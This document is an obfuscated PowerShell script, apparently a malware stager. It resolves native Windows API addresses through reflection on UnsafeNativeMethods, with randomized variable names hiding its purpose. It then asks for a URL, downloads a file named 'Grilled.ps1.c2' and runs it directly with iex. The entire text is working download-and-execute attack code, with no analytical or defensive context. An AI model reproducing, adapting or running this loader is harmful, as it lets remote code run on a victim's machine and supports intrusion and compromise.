function Get-ProcAddress {
    Param(
        [Parameter(Position = 0, Mandatory = $True)] [String] $hnlrhOVYKDLqzqIajBANcXirfkNb,
        [Parameter(Position = 1, Mandatory = $True)] [String] $QgOQFrXvEBwwaCeYHbOoreJhsbRNeVqic
    )

    # Microsoft".
    $gMVHSMsnIeojVGCyuthkcG = [AppDomain]::CurrentDomain.GetAssemblies() |
    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
    $ValpUwkJTkwkLfuaiSYxcaTYnpTGnJITWzdKAMU = $gMVHSMsnIeojVGCyuthkcG.GetType('Microsoft.Win32.UnsafeNativeMethods')
    # Microsoft".
    $bOXrHASfBWqDvslgTYktGNMYCvgcHF = $ValpUwkJTkwkLfuaiSYxcaTYnpTGnJITWzdKAMU.GetMethod('GetModuleHandle')
    $ECBrbyeDLZGpFOKYnKBakdIsqfRwxokSzZ = $ValpUwkJTkwkLfuaiSYxcaTYnpTGnJITWzdKAMU.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
    # Microsoft".
    $CzUaAdxDQspVIaonnJkMYVsBQAqCHuBLQN = $bOXrHASfBWqDvslgTYktGNMYCvgcHF.Invoke($null, @($hnlrhOVYKDLqzqIajBANcXirfkNb))
    $TvjMRMScKTwsdqXmaWevxVjaugqFlEe = New-Object IntPtr
    $omvXmEYVboejGuiJTJmHkphHKWOYPnZwOogdDFs = New-Object System.Runtime.InteropServices.HandleRef($TvjMRMScKTwsdqXmaWevxVjaugqFlEe, $CzUaAdxDQspVIaonnJkMYVsBQAqCHuBLQN)
    # Microsoft".
    return $ECBrbyeDLZGpFOKYnKBakdIsqfRwxokSzZ.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$omvXmEYVboejGuiJTJmHkphHKWOYPnZwOogdDFs, $QgOQFrXvEBwwaCeYHbOoreJhsbRNeVqic))
}
[string]::IsNullOrEmpty($prefixpath) -and ($prefixpath = Read-Host "Specify prefixpathUrl")
$wbc = New-Object System.Net.WebClient
$wbc.Encoding = [System.Text.Encoding]::UTF8
$wbc.DownloadString("$prefixpath/Grilled.ps1.c2") | iex
